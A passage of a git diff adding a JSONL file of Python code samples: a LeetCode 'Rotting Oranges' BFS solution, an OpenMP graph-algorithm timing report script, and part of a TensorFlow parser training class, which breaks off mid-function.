diff --git "a/1508.jsonl" "b/1508.jsonl" new file mode 100644--- /dev/null +++ "b/1508.jsonl" @@ -0,0 +1,778 @@ +{"seq_id":"359735254","text":"#\n# @lc app=leetcode id=994 lang=python3\n#\n# [994] Rotting Oranges\n#\n# https://leetcode.com/problems/rotting-oranges/description/\n#\n# algorithms\n# Easy (46.54%)\n# Total Accepted: 5.7K\n# Total Submissions: 12.3K\n# Testcase Example: '[[2,1,1],[1,1,0],[0,1,1]]'\n#\n# In a given grid, each cell can have one of three values:\n# \n# \n# the value 0 representing an empty cell;\n# the value 1 representing a fresh orange;\n# the value 2 representing a rotten orange.\n# \n# \n# Every minute, any fresh orange that is adjacent (4-directionally) to a rotten\n# orange becomes rotten.\n# \n# Return the minimum number of minutes that must elapse until no cell has a\n# fresh orange.  If this is impossible, return -1 instead.\n# \n# \n# \n# \n# Example 1:\n# \n# \n# \n# \n# Input: [[2,1,1],[1,1,0],[0,1,1]]\n# Output: 4\n# \n# \n# \n# Example 2:\n# \n# \n# Input: [[2,1,1],[0,1,1],[1,0,1]]\n# Output: -1\n# Explanation: The orange in the bottom left corner (row 2, column 0) is never\n# rotten, because rotting only happens 4-directionally.\n# \n# \n# \n# Example 3:\n# \n# \n# Input: [[0,2]]\n# Output: 0\n# Explanation: Since there are already no fresh oranges at minute 0, the\n# answer is just 0.\n# \n# \n# \n# \n# Note:\n# \n# \n# 1 <= grid.length <= 10\n# 1 <= grid[0].length <= 10\n# grid[i][j] is only 0, 1, or 2.\n# \n# \n# \n# \n# \n#\nfrom collections import deque\n\n\nclass Solution(object):\n def orangesRotting(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n self.minutes = 0\n origins = 0\n q = deque()\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n origins += 1\n if grid[i][j] == 2:\n q.append((i, j))\n direction = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n while q and origins > 0:\n l = len(q)\n self.minutes += 1\n for i in range(l):\n x, y = q.popleft()\n for delate_x, delate_y in direction:\n next_x, next_y = x + delate_x, y + delate_y\n if not self.judge(next_x, next_y, grid):\n continue\n grid[next_x][next_y] = 2\n origins -= 1\n if (next_x, next_y) not in q:\n q.append((next_x, next_y))\n return self.minutes if origins == 0 else -1\n \n def judge(self, x, y, grid):\n return x >= 0 and x < len(grid) and y >= 0 and y < len(grid[0]) and grid[x][y] == 1\n\n\nif __name__ == '__main__':\n s = Solution()\n grid = [[0,2]]\n print(s.orangesRotting(grid=grid))\n \n","sub_path":"Breadth-first Search/easy/994.rotting-oranges.py","file_name":"994.rotting-oranges.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301353279","text":"import os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\nDATASET = [4039,5000,5881,10000]\nPROCESSOR = [1,2,4,10,20,40]\n\nbfs_sequential = dict()\nbfs_parral = dict()\nbfs_overhead = dict()\n\npr_sequential = dict()\npr_parral = dict()\npr_overhead = dict()\n\nsssp_sequential = dict()\nsssp_parral = dict()\nsssp_overhead = dict()\n\nfor ds in DATASET:\n\tbfs_parral[ds] = dict()\n\tbfs_overhead[ds] = dict()\n\tpr_parral[ds] = dict()\n\tpr_overhead[ds] = dict()\n\tsssp_parral[ds] = dict()\n\tsssp_overhead[ds] = dict()\n\tfor p in PROCESSOR:\n\t\tbfs_parral[ds][p] = list()\n\t\tpr_parral[ds][p] = list()\n\t\tsssp_parral[ds][p] = list()\n\nbfs_openmp = open('./bfs/out_bfs_omp_1.txt','r')\nbfs_openmp_line = bfs_openmp.readlines()\n\npr_openmp = open('./pr/out_pr_omp_1.txt','r')\npr_openmp_line = pr_openmp.readlines()\n\nsssp_openmp = open('./sssp/out_sssp_omp_1.txt','r')\nsssp_openmp_line = sssp_openmp.readlines()\n\nindex = 0\nfor line in bfs_openmp_line:\n\tline = line.strip()\n\tif index == 0:\n\t\tbfs_sequential[4039] = float(line)\n\telif index == 1:\n\t\tbfs_sequential[5000] = float(line)\n\telif index == 2:\n\t\tbfs_sequential[5881] = float(line)\n\telif index == 3:\n\t\tbfs_sequential[10000] = float(line)\n\telse:\n\t\tindex_new = index - 4\n\t\toffset = index_new % 24 \n\t\tdataset_offset = (int) (offset / 6)\n\t\tprocessor_offset = offset - dataset_offset * 6\n\t\t# print(dataset_offset,processor_offset,line)\n\t\tbfs_parral[DATASET[dataset_offset]][PROCESSOR[processor_offset]].append(float(line))\n\n\tindex += 1\nindex = 0\nindex_n = 0\nfor line in pr_openmp_line:\n\tline = line.strip()\n\tif index % 2 == 1:\n\t\tif index_n == 0:\n\t\t\tpr_sequential[4039] = float(line)\n\t\telif index_n == 1:\n\t\t\tpr_sequential[5000] = float(line)\n\t\telif index_n == 2:\n\t\t\tpr_sequential[5881] = float(line)\n\t\telif index_n == 3:\n\t\t\tpr_sequential[10000] = float(line)\n\t\telse:\n\t\t\tindex_new = index_n - 4\n\t\t\toffset = index_new % 24\n\t\t\tdataset_offset = (int)(offset / 6)\n\t\t\tprocessor_offset = offset - dataset_offset * 6\n\t\t\t# print(index_new,dataset_offset,processor_offset,line)\n\t\t\tpr_parral[DATASET[dataset_offset]][PROCESSOR[processor_offset]].append(float(line))\n\t\tindex_n += 1\n\tindex += 1\n\nindex = 0\nfor line in sssp_openmp_line:\n\tline = line.strip()\n\tif index == 0:\n\t\tsssp_sequential[4039] = float(line)\n\telif index == 1:\n\t\tsssp_sequential[5000] = float(line)\n\telif index == 2:\n\t\tsssp_sequential[5881] = float(line)\n\telif index == 3:\n\t\tsssp_sequential[10000] = float(line)\n\telse:\n\t\tindex_new = index - 4\n\t\toffset = index_new % 24 \n\t\tdataset_offset = (int) (offset / 6)\n\t\tprocessor_offset = offset - dataset_offset * 6\n\t\t# print(dataset_offset,processor_offset,line)\n\t\tsssp_parral[DATASET[dataset_offset]][PROCESSOR[processor_offset]].append(float(line))\n\n\tindex += 1\n\n\nbfs_plot = dict()\nsssp_plot = dict()\npr_plot = dict()\n\nbfs_time_plot = dict()\npr_time_plot = dict()\nsssp_time_plot = dict()\n\nbfs_time_acc = dict()\npr_time_acc = dict()\nsssp_time_acc = dict()\n\nthread_cost = list()\nx = ['p=1','p=2','p=4','p=10','p=20','p=40']\nfor ds in DATASET:\n\tbfs_plot[ds] = list()\n\tsssp_plot[ds] = list()\n\tpr_plot[ds] = list()\n\n\tbfs_time_plot[ds] = dict()\n\tpr_time_plot[ds] = dict()\n\tsssp_time_plot[ds] = dict()\n\n\tbfs_time_acc[ds] = dict()\n\tpr_time_acc[ds] = dict()\n\tsssp_time_acc[ds] = dict()\t\n\n\tfor p in PROCESSOR:\n\t\t# print(pr_parral[ds][p])\n\t\tbfs_parral[ds][p] = round(sum(bfs_parral[ds][p])/len(bfs_parral[ds][p]),4)\n\t\tbfs_time_plot[ds][p] = bfs_parral[ds][p]\n\t\tbfs_time_acc[ds][p] = round(bfs_sequential[ds]/bfs_parral[ds][p],4)\n\n\t\tpr_parral[ds][p] = round(sum(pr_parral[ds][p])/len(pr_parral[ds][p]),4)\n\t\tpr_time_plot[ds][p] = pr_parral[ds][p]\n\t\tpr_time_acc[ds][p] = round(pr_sequential[ds]/pr_parral[ds][p],4)\n\n\t\tsssp_parral[ds][p] = round(sum(sssp_parral[ds][p])/len(sssp_parral[ds][p]),4)\n\t\tsssp_time_plot[ds][p] = sssp_parral[ds][p]\n\t\tsssp_time_acc[ds][p] = round(sssp_sequential[ds]/sssp_parral[ds][p],4)\n\n\t\t# print(sssp_parral[ds][p], sssp_sequential[ds])\n\t\tbfs_overhead[ds][p] = bfs_parral[ds][p] - round(bfs_sequential[ds] / p, 4)\n\t\tpr_overhead[ds][p] = pr_parral[ds][p] - round(pr_sequential[ds] / p, 4)\n\t\tsssp_overhead[ds][p] = sssp_parral[ds][p] - round(sssp_sequential[ds] / p, 4)\n\t\tif p == 1:\n\t\t\tif bfs_overhead[ds][p] > 0:\n\t\t\t\tthread_cost.append(bfs_overhead[ds][p])\n\t\t\tif pr_overhead[ds][p] > 0:\n\t\t\t\tthread_cost.append(pr_overhead[ds][p])\n\t\t\tif sssp_overhead[ds][p] > 0:\n\t\t\t\tthread_cost.append(sssp_overhead[ds][p])\n\t\tbfs_plot[ds].append(bfs_overhead[ds][p])\n\t\tpr_plot[ds].append(pr_overhead[ds][p])\n\t\tsssp_plot[ds].append(sssp_overhead[ds][p])\n\n\t\t# print(\"BFS\\tDATASET:\",ds,\"PROCESSOR:\",p,\"OVERHEAD:\",round(bfs_overhead[ds][p],4))\n\t\t# print(\"PR\\tDATASET:\",ds,\"PROCESSOR:\",p,\"OVERHEAD:\",round(pr_overhead[ds][p],4))\n\t\t# print(\"SSSP\\tDATASET:\",ds,\"PROCESSOR:\",p,\"OVERHEAD:\",round(sssp_overhead[ds][p],4))\n\t\t# print(\"sequntial: \",bfs_sequential[ds],\"parral: \",bfs_parral[ds][p] )\n\nthread_cost = sum(thread_cost)/len(thread_cost)\n\n\nprint (\"System + Thread cost, T(PARALLEL(WITH PROCESSOR = 1)) - T(SEQUENTIAL): \",round(thread_cost,4))\nprint()\nprint()\nprint(\"+\"*40+\"BFS TIME\"+\"+\"*41)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(bfs_time_plot[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*38+\"BFS TIME ACC\"+\"+\"*39)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(bfs_time_acc[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*41+\"PR TIME\"+\"+\"*41)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(pr_time_plot[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*39+\"PR TIME ACC\"+\"+\"*39)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(pr_time_acc[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\n\nprint()\nprint()\nprint(\"+\"*40+\"SSSP TIME\"+\"+\"*40)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(sssp_time_plot[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*38+\"SSSP TIME ACC\"+\"+\"*38)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(sssp_time_acc[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n'''' sssp '''\n\n'''ind = np.arange(len(x))\nwidth = 0.2\nfig, ax = plt.subplots()\ny1 = np.array(bfs_plot[4039])\ny2 = np.array(bfs_plot[5000])\ny3 = np.array(bfs_plot[5881])\ny4 = np.array(bfs_plot[10000])\nrects1 = ax.bar(ind, y1, width, color='r')\nrects2 = ax.bar(ind + width, y2, width, color='y')\nrects3 = ax.bar(ind + width * 2, y3, width, color='g')\nrects4 = ax.bar(ind + width * 3, y4, width, color='b')\n\nax.set_ylabel('Overhead')\nax.set_title('Overhead for BFS according to processor')\nax.set_xticks(ind + (width + width +width) / 2)\nax.set_xticklabels(('p:1', 'p:2', 'p:4', 'p:10', 'p:20','p:40'))\n\nax.legend((rects1,rects2,rects3,rects4), ('DS:4039','DS:5000','DS:5881','DS:10000'))\n\n# plt.show()\n\nfig, ax = plt.subplots()\ny1 = np.array(pr_plot[4039])\ny2 = np.array(pr_plot[5000])\ny3 = np.array(pr_plot[5881])\ny4 = np.array(pr_plot[10000])\nrects1 = ax.bar(ind, y1, width, color='r')\nrects2 = ax.bar(ind + width, y2, width, color='y')\nrects3 = ax.bar(ind + width * 2, y3, width, color='g')\nrects4 = ax.bar(ind + width * 3, y4, width, color='b')\n\nax.set_ylabel('Overhead')\nax.set_title('Overhead for PR according to processor')\nax.set_xticks(ind + (width + width +width) / 2)\nax.set_xticklabels(('p:1', 'p:2', 'p:4', 'p:10', 'p:20','p:40'))\n\nax.legend((rects1,rects2,rects3,rects4), ('pr:4039','pr:5000','pr:5881','pr:10000'))\n\n# plt.show()\n\nfig, ax = plt.subplots()\ny1 = np.array(sssp_plot[4039])\ny2 = np.array(sssp_plot[5000])\ny3 = np.array(sssp_plot[5881])\ny4 = np.array(sssp_plot[10000])\nrects1 = ax.bar(ind, y1, width, color='r')\nrects2 = ax.bar(ind + width, y2, width, color='y')\nrects3 = ax.bar(ind + width * 2, y3, width, color='g')\nrects4 = ax.bar(ind + width * 3, y4, width, color='b')\n\nax.set_ylabel('Overhead')\nax.set_title('Overhead for SSSP according to processor')\nax.set_xticks(ind + (width + width +width) / 2)\nax.set_xticklabels(('p:1', 'p:2', 'p:4', 'p:10', 'p:20','p:40'))\n\nax.legend((rects1,rects2,rects3,rects4), ('sssp:4039','sssp:5000','sssp:5881','sssp:10000'))'''\n\n# plt.show()\n\n\n\n\n\n\n","sub_path":"GraphApplication/omp_time_l.py","file_name":"omp_time_l.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"427650503","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2016 Timothy Dozat\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport pickle as pkl\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom lib import models\nfrom lib import optimizers\nfrom lib import rnn_cells\n\nfrom configurable import Configurable\nfrom vocab import Vocab\nfrom dataset import Dataset\nimport contextlib\nfrom subprocess import check_output, CalledProcessError\nimport operator\n\n@contextlib.contextmanager\ndef dummy_context_mgr():\n yield None\n\n#***************************************************************\nclass Network(Configurable):\n \"\"\"\"\"\"\n \n #=============================================================\n def __init__(self, model, *args, **kwargs):\n \"\"\"\"\"\"\n if args:\n if len(args) > 1:\n raise TypeError('Parser takes at most one argument')\n \n kwargs['name'] = kwargs.pop('name', model.__name__)\n super(Network, self).__init__(*args, **kwargs)\n if not os.path.isdir(self.save_dir):\n os.mkdir(self.save_dir)\n with open(os.path.join(self.save_dir, 'config.cfg'), 'w') as f:\n self._config.write(f)\n\n self._global_step = tf.Variable(0., trainable=False, name=\"global_step\")\n self._global_epoch = tf.Variable(0., trainable=False, name=\"global_epoch\")\n\n # todo what is this??\n # self._model = model(self._config, global_step=self.global_step)\n self._model = model(self._config)\n\n self._vocabs = []\n\n if self.conll:\n vocab_files = [(self.word_file, 1, 'Words', self.embed_size),\n (self.tag_file, [3, 4], 'Tags', self.embed_size if self.add_pos_to_input else 0),\n (self.rel_file, 7, 'Rels', 0)]\n elif self.conll2012:\n vocab_files = [(self.word_file, 3, 'Words', self.embed_size),\n (self.tag_file, [5, 4], 'Tags', self.embed_size if self.add_pos_to_input else 0), # auto, gold\n (self.rel_file, 7, 'Rels', 0),\n (self.srl_file, range(14, 50), 'SRLs', 0),\n (self.predicates_file, [10, 4] if self.joint_pos_predicates else 10,\n 'Predicates', self.predicate_embed_size if self.add_predicates_to_input else 0),\n (self.domain_file, 0, 'Domains', 0)]\n\n print(\"Loading vocabs\")\n sys.stdout.flush()\n for i, (vocab_file, index, name, embed_size) in enumerate(vocab_files):\n vocab = Vocab(vocab_file, index, embed_size, self._config,\n name=name,\n cased=self.cased if not i else True,\n use_pretrained=(not i))\n self._vocabs.append(vocab)\n\n print(\"Predicates vocab: \")\n for l, i in sorted(self._vocabs[4].iteritems(), key=operator.itemgetter(1)):\n print(\"%s: %d\" % (l, i))\n print(\"predicate_true_start_idx\", self._vocabs[4].predicate_true_start_idx)\n\n print(\"Loading data\")\n sys.stdout.flush()\n self._trainset = Dataset(self.train_file, self._vocabs, model, self._config, name='Trainset')\n self._validset = Dataset(self.valid_file, self._vocabs, model, self._config, name='Validset')\n self._testset = Dataset(self.test_file, self._vocabs, model, self._config, name='Testset')\n\n self._ops = self._gen_ops()\n self._save_vars = filter(lambda x: u'Pretrained' not in x.name, tf.global_variables())\n self.history = {\n 'train_loss': [],\n 'train_accuracy': [],\n 'valid_loss': [],\n 'valid_accuracy': [],\n 'test_acuracy': 0\n }\n return\n \n #=============================================================\n def train_minibatches(self):\n \"\"\"\"\"\"\n \n return self._trainset.get_minibatches(self.train_batch_size,\n self.model.input_idxs,\n self.model.target_idxs)\n \n #=============================================================\n def valid_minibatches(self):\n \"\"\"\"\"\"\n \n return self._validset.get_minibatches(self.test_batch_size,\n self.model.input_idxs,\n self.model.target_idxs,\n shuffle=False)\n \n #=============================================================\n def test_minibatches(self):\n \"\"\"\"\"\"\n \n return self._testset.get_minibatches(self.test_batch_size,\n self.model.input_idxs,\n self.model.target_idxs,\n shuffle=False)\n \n #=============================================================\n # assumes the sess has already been initialized\n def train(self, sess, profile):\n \"\"\"\"\"\"\n print(\"Training\")\n training_start_time = time.time()\n sys.stdout.flush()\n save_path = os.path.join(self.save_dir, self.name.lower() + '-pretrained')\n saver = tf.train.Saver(self.save_vars, max_to_keep=1, save_relative_paths=True)\n \n n_bkts = self.n_bkts\n train_iters = self.train_iters\n print_every = self.print_every\n validate_every = self.validate_every\n save_every = self.save_every\n current_best = 0.0\n try:\n train_time = 0\n train_loss = 0\n train_log_loss = 0\n train_roots_loss = 0\n train_cycle2_loss = 0\n train_svd_loss = 0\n train_rel_loss = 0\n train_srl_loss = 0\n train_mul_loss = {}\n train_predicate_loss = 0\n train_pos_loss = 0\n n_train_sents = 0\n n_train_correct = 0\n n_train_tokens = 0\n n_train_iters = 0\n n_train_srl_correct = 0\n n_train_srl_count = 0\n n_train_predicate_count = 0\n n_train_predicate_correct = 0\n total_train_iters = 0\n valid_time = 0\n valid_loss = 0\n valid_accuracy = 0\n while total_train_iters < train_iters:\n for j, (feed_dict, _) in enumerate(self.train_minibatches()):\n # train_inputs = feed_dict[self._trainset.inputs]\n train_targets = feed_dict[self._trainset.targets]\n\n start_time = time.time()\n\n if profile:\n pctx.trace_next_step()\n # Dump the profile to '/tmp/train_dir' after the step.\n pctx.dump_next_step()\n\n feed_dict[self._trainset.step] = total_train_iters\n\n _, loss, n_correct, n_tokens, roots_loss, cycle2_loss, svd_loss, log_loss, rel_loss, srl_loss, srl_correct, srl_count, predicate_loss, predicate_count, predicate_correct, pos_loss, pos_correct, multitask_losses, lr, sample_prob = sess.run(self.ops['train_op_srl'], feed_dict=feed_dict)\n total_train_iters += 1\n train_time += time.time() - start_time\n train_loss += loss\n train_log_loss += log_loss\n train_roots_loss += roots_loss\n train_cycle2_loss += cycle2_loss\n train_svd_loss += svd_loss\n train_rel_loss += rel_loss\n train_srl_loss += srl_loss\n train_pos_loss += pos_loss\n train_predicate_loss += predicate_loss\n n_train_predicate_count += predicate_count\n n_train_predicate_correct += predicate_correct\n\n for n, l in multitask_losses.iteritems():\n if n not in train_mul_loss.keys():\n train_mul_loss[n] = 0.\n train_mul_loss[n] += l\n\n n_train_sents += len(train_targets)\n n_train_correct += n_correct\n n_train_tokens += n_tokens\n n_train_srl_correct += srl_correct\n n_train_srl_count += srl_count\n n_train_iters += 1\n self.history['train_loss'].append(loss)\n self.history['train_accuracy'].append(100 * n_correct / n_tokens)\n if total_train_iters == 1 or total_train_iters % validate_every == 0:\n valid_time = 0\n valid_loss = 0\n n_valid_sents = 0\n n_valid_correct = 0\n n_valid_tokens = 0\n with open(os.path.join(self.save_dir, 'sanitycheck.txt'), 'w') as f:\n for k, (feed_dict, _) in enumerate(self.valid_minibatches()):\n inputs = feed_dict[self._validset.inputs]\n targets = feed_dict[self._validset.targets]\n start_time = time.time()\n loss, n_correct, n_tokens, predictions = sess.run(self.ops['valid_op'], feed_dict=feed_dict)\n valid_time += time.time() - start_time\n valid_loss += loss\n n_valid_sents += len(targets)\n n_valid_correct += n_correct\n n_valid_tokens += n_tokens\n self.model.sanity_check(inputs, targets, predictions, self._vocabs, f, feed_dict=feed_dict)\n valid_loss /= k+1\n valid_accuracy = 100 * n_valid_correct / n_valid_tokens\n valid_time = n_valid_sents / valid_time\n self.history['valid_loss'].append(valid_loss)\n self.history['valid_accuracy'].append(valid_accuracy)\n if print_every and total_train_iters % print_every == 0:\n train_loss /= n_train_iters\n train_log_loss /= n_train_iters\n train_roots_loss /= n_train_iters\n train_cycle2_loss /= n_train_iters\n train_svd_loss /= n_train_iters\n train_rel_loss /= n_train_iters\n train_srl_loss /= n_train_iters\n train_predicate_loss /= n_train_iters\n train_pos_loss /= n_train_iters\n train_accuracy = 100 * n_train_correct / n_train_tokens\n train_time = n_train_sents / train_time\n print('%6d) Train loss: %.4f Train acc: %5.2f%% Train rate: %6.1f sents/sec Learning rate: %f Sample prob: %f\\n'\n '\\tValid loss: %.4f Valid acc: %5.2f%% Valid rate: %6.1f sents/sec' %\n (total_train_iters, train_loss, train_accuracy, train_time, lr, sample_prob, valid_loss, valid_accuracy, valid_time))\n print('\\tlog loss: %f\\trel loss: %f\\tsrl loss: %f\\ttrig loss: %f\\tpos loss: %f' % (train_log_loss, train_rel_loss, train_srl_loss, train_predicate_loss, train_pos_loss))\n multitask_losses_str = ''\n for n, l in train_mul_loss.iteritems():\n train_mul_loss[n] = l/n_train_iters\n multitask_losses_str += '\\t%s loss: %f' % (n, train_mul_loss[n])\n print(multitask_losses_str)\n sys.stdout.flush()\n train_time = 0\n train_loss = 0\n n_train_sents = 0\n n_train_correct = 0\n n_train_tokens = 0\n n_train_iters = 0\n train_log_loss = 0\n train_roots_loss = 0\n train_cycle2_loss = 0\n train_rel_loss = 0\n train_predicate_loss = 0\n train_srl_loss = 0\n n_train_srl_correct = 0\n n_train_srl_count = 0\n n_train_predicate_correct = 0\n n_train_predicate_count = 0\n if save_every and (total_train_iters % save_every == 0):\n elapsed_time_str = time.strftime(\"%d:%H:%M:%S\", time.gmtime(time.time()-training_start_time))\n print(\"Elapsed time: %s\" % elapsed_time_str)\n with open(os.path.join(self.save_dir, 'history.pkl'), 'w') as f:\n pkl.dump(self.history, f)\n # only look at non-viterbi decoding if we didn't train w/ crf\n current_score = 0.\n # if not self.viterbi_train:\n # correct = self.test(sess, validate=True)\n # current_score = correct[self.eval_criterion]\n if self.viterbi_decode or self.viterbi_train:\n correct = self.test(sess, viterbi=True, validate=True)\n else:\n correct = self.test(sess, validate=True)\n current_score = correct[self.eval_criterion]\n # las = np.mean(correct[\"LAS\"]) * 100\n # uas = np.mean(correct[\"UAS\"]) * 100\n # print('UAS: %.2f LAS: %.2f' % (uas, las))\n if self.save and current_score > current_best:\n current_best = current_score\n print(\"Writing model to %s\" % (os.path.join(self.save_dir, self.name.lower() + '-trained')))\n saver.save(sess, os.path.join(self.save_dir, self.name.lower() + '-trained'),\n latest_filename=self.name.lower(),\n global_step=self.global_epoch,\n write_meta_graph=False)\n if self.eval_parse:\n with open(os.path.join(self.save_dir, \"parse_results.txt\"), 'w') as parse_results_f:\n print(correct['parse_eval'], file=parse_results_f)\n # with open(os.path.join(self.save_dir, 'history.pkl'), 'w') as f:\n # pkl.dump(self.history, f)\n # self.test(sess, validate=True)\n sess.run(self._global_epoch.assign_add(1.))\n except KeyboardInterrupt:\n try:\n raw_input('\\nPress to save or to exit.')\n except:\n print('\\r', end='')\n sys.exit(0)\n # saver.save(sess, os.path.join(self.save_dir, self.name.lower() + '-trained'),\n # latest_filename=self.name.lower(),\n # global_step=self.global_epoch,\n # write_meta_graph=False)\n # with open(os.path.join(self.save_dir, 'history.pkl'), 'w') as f:\n # pkl.dump(self.history, f)\n # with open(os.path.join(self.save_dir, 'scores.txt'), 'a') as f:\n # pass\n self.test(sess, validate=True)\n return\n\n\n def convert_bilou(self, indices):\n strings = map(lambda i: self._vocabs[3][i], indices)\n converted = []\n started_types = []\n # print(strings)\n for i, s in enumerate(strings):\n label_parts = s.split('/')\n curr_len = len(label_parts)\n combined_str = ''\n Itypes = []\n Btypes = []\n for idx, label in enumerate(label_parts):\n bilou = label[0]\n label_type = label[2:]\n props_str = ''\n if bilou == 'I':\n Itypes.append(label_type)\n props_str = ''\n elif bilou == 'O':\n curr_len = 0\n props_str = ''\n elif bilou == 'U':\n # need to check whether last one was ended\n props_str = '(' + label_type + ('*)' if idx == len(label_parts) - 1 else \"\")\n elif bilou == 'B':\n # need to check whether last one was ended\n props_str = '(' + label_type\n started_types.append(label_type)\n Btypes.append(label_type)\n elif bilou == 'L':\n props_str = ')'\n started_types.pop()\n curr_len -= 1\n combined_str += props_str\n while len(started_types) > curr_len:\n 